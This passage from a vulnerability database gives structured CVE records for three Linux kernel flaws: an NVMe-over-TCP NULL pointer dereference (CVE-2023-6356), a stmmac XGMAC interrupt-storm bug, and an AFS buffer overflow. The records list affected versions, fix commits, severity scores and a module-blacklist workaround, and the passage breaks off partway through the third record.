"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::realtime",
"cpe:/a:redhat:rhel_eus:9.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Alon Zahavi for reporting this issue."
}
],
"datePublic": "2023-12-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T21:45:11.718Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6356"
},
{
"name": "RHBZ#2254054",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: null pointer dereference in nvmet_tcp_build_iovec",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6356",
"datePublished": "2024-02-07T21:04:20.684Z",
"dateReserved": "2023-11-28T05:16:10.932Z",
"dateUpdated": "2025-11-06T21:45:11.718Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26684 (GCVE-0-2024-26684)
Vulnerability from cvelistv5
Published
2024-04-02 07:01
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: xgmac: fix handling of DPP safety error for DMA channels
Commit 56e58d6c8a56 ("net: stmmac: Implement Safety Features in
XGMAC core") checks and reports safety errors, but leaves the
Data Path Parity Errors for each channel in DMA unhandled at all, lead to
a storm of interrupt.
Fix it by checking and clearing the DMA_DPP_Interrupt_Status register.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 Version: 56e58d6c8a5640eb708e85866e9d243d0357ee54 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.724Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9837c83befb5b852fa76425dde98a87b737df00"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2fc45a4631ac7837a5c497cb4f7e2115d950fc37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6609e98ed82966a1b3168c142aca30f8284a7b89"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e42ff0844fe418c7d03a14f9f90e1b91ba119591"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e0ff50131e9d1aa507be8e670d38e9300a5f5bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b48c9e258c8691c2f093ee07b1ea3764caaa1b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46eba193d04f8bd717e525eb4110f3c46c12aec3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26684",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:13.472290Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:33.916Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/common.h",
"drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h",
"drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e9837c83befb5b852fa76425dde98a87b737df00",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "2fc45a4631ac7837a5c497cb4f7e2115d950fc37",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "6609e98ed82966a1b3168c142aca30f8284a7b89",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "e42ff0844fe418c7d03a14f9f90e1b91ba119591",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "7e0ff50131e9d1aa507be8e670d38e9300a5f5bf",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "3b48c9e258c8691c2f093ee07b1ea3764caaa1b2",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
},
{
"lessThan": "46eba193d04f8bd717e525eb4110f3c46c12aec3",
"status": "affected",
"version": "56e58d6c8a5640eb708e85866e9d243d0357ee54",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/common.h",
"drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h",
"drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: xgmac: fix handling of DPP safety error for DMA channels\n\nCommit 56e58d6c8a56 (\"net: stmmac: Implement Safety Features in\nXGMAC core\") checks and reports safety errors, but leaves the\nData Path Parity Errors for each channel in DMA unhandled at all, lead to\na storm of interrupt.\nFix it by checking and clearing the DMA_DPP_Interrupt_Status register."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:59.612Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e9837c83befb5b852fa76425dde98a87b737df00"
},
{
"url": "https://git.kernel.org/stable/c/2fc45a4631ac7837a5c497cb4f7e2115d950fc37"
},
{
"url": "https://git.kernel.org/stable/c/6609e98ed82966a1b3168c142aca30f8284a7b89"
},
{
"url": "https://git.kernel.org/stable/c/e42ff0844fe418c7d03a14f9f90e1b91ba119591"
},
{
"url": "https://git.kernel.org/stable/c/7e0ff50131e9d1aa507be8e670d38e9300a5f5bf"
},
{
"url": "https://git.kernel.org/stable/c/3b48c9e258c8691c2f093ee07b1ea3764caaa1b2"
},
{
"url": "https://git.kernel.org/stable/c/46eba193d04f8bd717e525eb4110f3c46c12aec3"
}
],
"title": "net: stmmac: xgmac: fix handling of DPP safety error for DMA channels",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26684",
"datePublished": "2024-04-02T07:01:46.687Z",
"dateReserved": "2024-02-19T14:20:24.153Z",
"dateUpdated": "2025-05-04T08:53:59.612Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26736 (GCVE-0-2024-26736)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
afs: Increase buffer size in afs_update_volume_status()
The max length of volume->vid value is 20 characters.
So increase idbuf[] size up to 24 to avoid overflow.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[DH: Actually, it's 20 + NUL, so increase it to 24 and use snprintf()]
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 Version: d2ddc776a4581d900fc3bdc7803b403daae64d88 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26736",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T17:35:04.677455Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:32.562Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.959Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d9b5e2b7a8196850383c70d099bfd39e81ab6637"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e56662160fc24d28cb75ac095cc6415ae1bda43e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8530b170e464017203e3b8c6c49af6e916aece1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e6065dd25b661420fac19c34282b6c626fcd35e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d34a5e57632bb5ff825196ddd9a48ca403626dfa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/afs/volume.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "d9b5e2b7a8196850383c70d099bfd39e81ab6637",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "e56662160fc24d28cb75ac095cc6415ae1bda43e",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "e8530b170e464017203e3b8c6c49af6e916aece1",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "6e6065dd25b661420fac19c34282b6c626fcd35e",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "d34a5e57632bb5ff825196ddd9a48ca403626dfa",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
},
{
"lessThan": "6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d",
"status": "affected",
"version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/afs/volume.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
